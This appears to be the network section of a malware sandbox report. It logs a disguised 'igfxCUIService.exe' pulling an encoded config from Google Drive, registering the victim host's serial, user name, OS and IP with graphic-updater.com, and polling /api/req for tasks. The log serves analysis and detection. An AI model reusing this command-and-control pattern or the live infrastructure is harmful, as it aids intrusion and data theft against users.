                                        Jan 11, 2022 17:09:30.758044004 CET8.8.8.8192.168.2.40x5dc7No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:30.791578054 CET8.8.8.8192.168.2.40x54e8No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)

HTTP Request Dependency Graph

• drive.google.com
• doc-0k-2o-docs.googleusercontent.com
• graphic-updater.com

HTTPS Proxied Packets

Session ID: 0
Source: 192.168.2.4:49792
Destination: 142.250.181.238:443
Process: C:\ProgramData\SystemData\igfxCUIService.exe

2022-01-11 16:09:02 UTC | 0 kB transferred | OUT
GET /uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHttpClient
Content-Length: 0
Host: drive.google.com

2022-01-11 16:09:02 UTC | 0 kB transferred | IN
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 11 Jan 2022 16:09:02 GMT
Location: https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
Content-Security-Policy: script-src 'nonce-aQZ7MD3qwWYnTaIflt+xJA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Set-Cookie: NID=511=rZxf95vblBRpbsrQhgLzt2ykOFOmpXip2Dtfpo1p6H0fjVcc9YaMJ_dv5zhJwmmECKZ0sM1Bj_0xGRZPXYU7TkQggEjNr-46rw61qICTIj1WQU3yNporpvDRugN7FIMTRqfalOrT6ECly2VoGY_E0CMtcBo9mFPOLHmjZUyc74g; expires=Wed, 13-Jul-2022 16:09:02 GMT; path=/; domain=.google.com; HttpOnly
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2022-01-11 16:09:02 UTC | 1 kB transferred | IN
Data Ascii: 179<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot33
2022-01-11 16:09:02 UTC | 2 kB transferred | IN
Data Ascii: 0


Session ID: 1
Source: 192.168.2.4:49793
Destination: 142.250.185.129:443
Process: C:\ProgramData\SystemData\igfxCUIService.exe

2022-01-11 16:09:03 UTC | 2 kB transferred | OUT
GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHttpClient
Content-Length: 0
Host: doc-0k-2o-docs.googleusercontent.com

2022-01-11 16:09:03 UTC | 2 kB transferred | IN
HTTP/1.1 200 OK
X-GUploader-UploadID: ADPycdsfNTzTdzhXW0v90TbpHTodIpTkSIgvdqCmSsCEJ1765WIIHBf53IHllSgy4KLvpV8XcZPgEPbM33oj1aZYikA
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
Access-Control-Allow-Methods: GET,OPTIONS
Content-Type: text/plain
Content-Disposition: attachment;filename="domain.txt";filename*=UTF-8''domain.txt
Content-Length: 56
Date: Tue, 11 Jan 2022 16:09:03 GMT
Expires: Tue, 11 Jan 2022 16:09:03 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=zkaohA==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Connection: close
2022-01-11 16:09:03 UTC | 6 kB transferred | IN
Data Ascii: NmsjCSAgWSlhaVMvJz0SQH5+aiUzMCUpKFdqOzEgIjYMI2UhCDxmFg==


Session ID: 10
Source: 192.168.2.4:49803
Destination: 23.254.131.176:443
Process: C:\ProgramData\SystemData\igfxCUIService.exe

2022-01-11 16:09:10 UTC | 10 kB transferred | OUT
POST /api/req HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHttpClient
Content-Length: 42
Host: graphic-updater.com
2022-01-11 16:09:10 UTC | 10 kB transferred | OUT
Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
2022-01-11 16:09:11 UTC | 10 kB transferred | IN
HTTP/1.1 200 OK
Date: Tue, 11 Jan 2022 16:09:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Cache-Control: no-cache, private
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 51
Access-Control-Allow-Origin: *
Content-Length: 11
Connection: close
Content-Type: application/json
2022-01-11 16:09:11 UTC | 10 kB transferred | IN
Data Ascii: {"data":[]}


Session ID: 11
Source: 192.168.2.4:49804
Destination: 23.254.131.176:443
Process: C:\ProgramData\SystemData\igfxCUIService.exe

2022-01-11 16:09:11 UTC | 10 kB transferred | OUT
POST /api/req HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHttpClient
Content-Length: 42
Host: graphic-updater.com
2022-01-11 16:09:11 UTC | 10 kB transferred | OUT
Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
2022-01-11 16:09:12 UTC | 10 kB transferred | IN
HTTP/1.1 200 OK
Date: Tue, 11 Jan 2022 16:09:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Cache-Control: no-cache, private
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 50
Access-Control-Allow-Origin: *
Content-Length: 11
Connection: close
Content-Type: application/json
2022-01-11 16:09:12 UTC | 11 kB transferred | IN
Data Ascii: {"data":[]}


Session ID: 12
Source: 192.168.2.4:49805
Destination: 23.254.131.176:443
Process: C:\ProgramData\SystemData\igfxCUIService.exe

2022-01-11 16:09:12 UTC | 11 kB transferred | OUT
POST /api/req HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHttpClient
Content-Length: 42
Host: graphic-updater.com
2022-01-11 16:09:12 UTC | 11 kB transferred | OUT
Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
2022-01-11 16:09:12 UTC | 11 kB transferred | IN
HTTP/1.1 200 OK
Date: Tue, 11 Jan 2022 16:09:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Cache-Control: no-cache, private
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 49
Access-Control-Allow-Origin: *
Content-Length: 11
Connection: close
Content-Type: application/json
2022-01-11 16:09:12 UTC | 11 kB transferred | IN
Data Ascii: {"data":[]}


Session ID: 13
Source: 192.168.2.4:49806
Destination: 23.254.131.176:443
Process: C:\ProgramData\SystemData\igfxCUIService.exe

2022-01-11 16:09:13 UTC | 11 kB transferred | OUT
POST /api/req HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHttpClient
Content-Length: 42
Host: graphic-updater.com
2022-01-11 16:09:13 UTC | 11 kB transferred | OUT
Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
2022-01-11 16:09:13 UTC | 11 kB transferred | IN
HTTP/1.1 200 OK
Date: Tue, 11 Jan 2022 16:09:13 GMT
Server: Apache/2.4.41 (Ubuntu)
Cache-Control: no-cache, private
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 48
Access-Control-Allow-Origin: *
Content-Length: 11
Connection: close
Content-Type: application/json
2022-01-11 16:09:13 UTC | 12 kB transferred | IN
Data Ascii: {"data":[]}


Session ID: 14
Source: 192.168.2.4:49807
Destination: 23.254.131.176:443
Process: C:\ProgramData\SystemData\igfxCUIService.exe

2022-01-11 16:09:14 UTC | 12 kB transferred | OUT
POST /api/req HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHttpClient
Content-Length: 42
Host: graphic-updater.com
2022-01-11 16:09:14 UTC | 12 kB transferred | OUT
Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
2022-01-11 16:09:14 UTC | 12 kB transferred | IN
HTTP/1.1 200 OK
Date: Tue, 11 Jan 2022 16:09:14 GMT
Server: Apache/2.4.41 (Ubuntu)
Cache-Control: no-cache, private
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 47
Access-Control-Allow-Origin: *
Content-Length: 11
Connection: close
Content-Type: application/json
2022-01-11 16:09:14 UTC | 12 kB transferred | IN
Data Ascii: {"data":[]}


Session ID: 15
Source: 192.168.2.4:49808
Destination: 23.254.131.176:443
Process: C:\ProgramData\SystemData\igfxCUIService.exe

2022-01-11 16:09:15 UTC | 12 kB transferred | OUT
POST /api/req HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHttpClient
Content-Length: 42
Host: graphic-updater.com
2022-01-11 16:09:15 UTC | 12 kB transferred | OUT
Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
2022-01-11 16:09:15 UTC | 12 kB transferred | IN
HTTP/1.1 200 OK
Date: Tue, 11 Jan 2022 16:09:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Cache-Control: no-cache, private
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 46
Access-Control-Allow-Origin: *
Content-Length: 11
Connection: close
Content-Type: application/json
2022-01-11 16:09:15 UTC | 13 kB transferred | IN
Data Ascii: {"data":[]}


Session ID: 16
Source: 192.168.2.4:49809
Destination: 23.254.131.176:443
Process: C:\ProgramData\SystemData\igfxCUIService.exe

2022-01-11 16:09:15 UTC | 13 kB transferred | OUT
POST /api/req HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHttpClient
Content-Length: 42
Host: graphic-updater.com
2022-01-11 16:09:15 UTC | 13 kB transferred | OUT
Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
2022-01-11 16:09:16 UTC | 13 kB transferred | IN
HTTP/1.1 200 OK
Date: Tue, 11 Jan 2022 16:09:16 GMT
Server: Apache/2.4.41 (Ubuntu)
Cache-Control: no-cache, private
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 45
Access-Control-Allow-Origin: *
Content-Length: 11
Connection: close
Content-Type: application/json
2022-01-11 16:09:16 UTC | 13 kB transferred | IN
Data Ascii: {"data":[]}


Session ID: 17
Source: 192.168.2.4:49810
Destination: 23.254.131.176:443
Process: C:\ProgramData\SystemData\igfxCUIService.exe

2022-01-11 16:09:16 UTC | 13 kB transferred | OUT
POST /api/req HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHttpClient
Content-Length: 42
Host: graphic-updater.com
2022-01-11 16:09:16 UTC | 13 kB transferred | OUT
Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
2022-01-11 16:09:16 UTC | 13 kB transferred | IN
HTTP/1.1 200 OK
Date: Tue, 11 Jan 2022 16:09:16 GMT
Server: Apache/2.4.41 (Ubuntu)
Cache-Control: no-cache, private
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 44
Access-Control-Allow-Origin: *
Content-Length: 11
Connection: close
Content-Type: application/json
2022-01-11 16:09:16 UTC | 14 kB transferred | IN
Data Ascii: {"data":[]}


Session ID: 18
Source: 192.168.2.4:49811
Destination: 142.250.181.238:443
Process: C:\ProgramData\SystemData\igfxCUIService.exe

2022-01-11 16:09:17 UTC | 14 kB transferred | OUT
GET /uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHttpClient
Content-Length: 0
Host: drive.google.com

2022-01-11 16:09:17 UTC | 14 kB transferred | IN
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 11 Jan 2022 16:09:17 GMT
Location: https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Security-Policy: script-src 'nonce-5keIZmKCFvZxMtIiWYd8eg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Set-Cookie: NID=511=U7Zw5DDcjJNndIDgsQcCkPsYp97yJ46anuamm8ztVdqU5BbQY5yoANLvizAh_LqdU-IvbmXmkVUQIbkrDD95FFXgm0XBltRpJNxxKUsYJ2nxmvRjZIKdoXltO9GA03zBrLXiUkra53XEMmrvBk26lO_LtvgU1uHe6eyUa69rd7w; expires=Wed, 13-Jul-2022 16:09:17 GMT; path=/; domain=.google.com; HttpOnly
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
Connection: close
Transfer-Encoding: chunked
                                        2022-01-11 16:09:17 UTC | 16 | IN | Data Raw: 31 37 39 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 6b 2d 32 6f 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 6f 74 33 33
                                        Data Ascii: 179<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot33
                                        2022-01-11 16:09:17 UTC | 16 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        19 | 192.168.2.4 | 49812 | 23.254.131.176 | 443 | C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:17 UTC | 14 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:17 UTC | 14 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:17 UTC | 16 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:17 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 43
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:17 UTC | 17 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        2 | 192.168.2.4 | 49795 | 23.254.131.176 | 443 | C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:03 UTC | 6 | OUT | POST /api/attach HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 136
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:03 UTC | 6 | OUT | Data Raw: 73 65 72 69 61 6c 3d 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 5f 5f 6a 6f 6e 65 73 26 6e 61 6d 65 3d 6a 6f 6e 65 73 26 75 73 65 72 5f 74 6f 6b 65 6e 3d 38 37 32 33 34 37 38 38 37 33 34 38 37 26 6f 73 3d 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 20 36 34 2d 62 69 74 20 31 30 2e 30 2e 31 37 31 33 34 26 61 6e 74 69 3d 26 69 70 3d 31 39 32 2e 31 36 38 2e 32 2e 34
                                        Data Ascii: serial=EC-F4-BB-EA-15-88__user&name=user&user_token=8723478873487&os= Microsoft Windows 10 Pro 64-bit 10.0.17134&anti=&ip=192.168.2.4
                                        2022-01-11 16:09:04 UTC | 6 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:04 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 59
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 48
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:04 UTC | 6 | IN | Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 22 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34 22 7d
                                        Data Ascii: {"token":"dda3e326-462d-4082-a6bd-07c7f1afd764"}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        20 | 192.168.2.4 | 49813 | 142.250.185.129 | 443 | C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:17 UTC | 16 | OUT | GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 0
                                        Host: doc-0k-2o-docs.googleusercontent.com
                                        2022-01-11 16:09:17 UTC | 17 | IN | HTTP/1.1 200 OK
                                        X-GUploader-UploadID: ADPycduFvXnpZlScVrvLpqLxxDaD7GG54hSUwAKYYOx4lHJX0IUvcpVVstorfp5CFC6eM2F3hH6sq3aC3hrWtHg-tEKQdWuXhg
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                        Access-Control-Allow-Methods: GET,OPTIONS
                                        Content-Type: text/plain
                                        Content-Disposition: attachment;filename="domain.txt";filename*=UTF-8''domain.txt
                                        Content-Length: 56
                                        Date: Tue, 11 Jan 2022 16:09:17 GMT
                                        Expires: Tue, 11 Jan 2022 16:09:17 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=zkaohA==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                        Connection: close
                                        2022-01-11 16:09:17 UTC | 20 | IN | Data Raw: 4e 6d 73 6a 43 53 41 67 57 53 6c 68 61 56 4d 76 4a 7a 30 53 51 48 35 2b 61 69 55 7a 4d 43 55 70 4b 46 64 71 4f 7a 45 67 49 6a 59 4d 49 32 55 68 43 44 78 6d 46 67 3d 3d
                                        Data Ascii: NmsjCSAgWSlhaVMvJz0SQH5+aiUzMCUpKFdqOzEgIjYMI2UhCDxmFg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        21 | 192.168.2.4 | 49814 | 23.254.131.176 | 443 | C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:18 UTC | 20 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:18 UTC | 21 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:18 UTC | 21 | IN | HTTP/1.1 200 OK
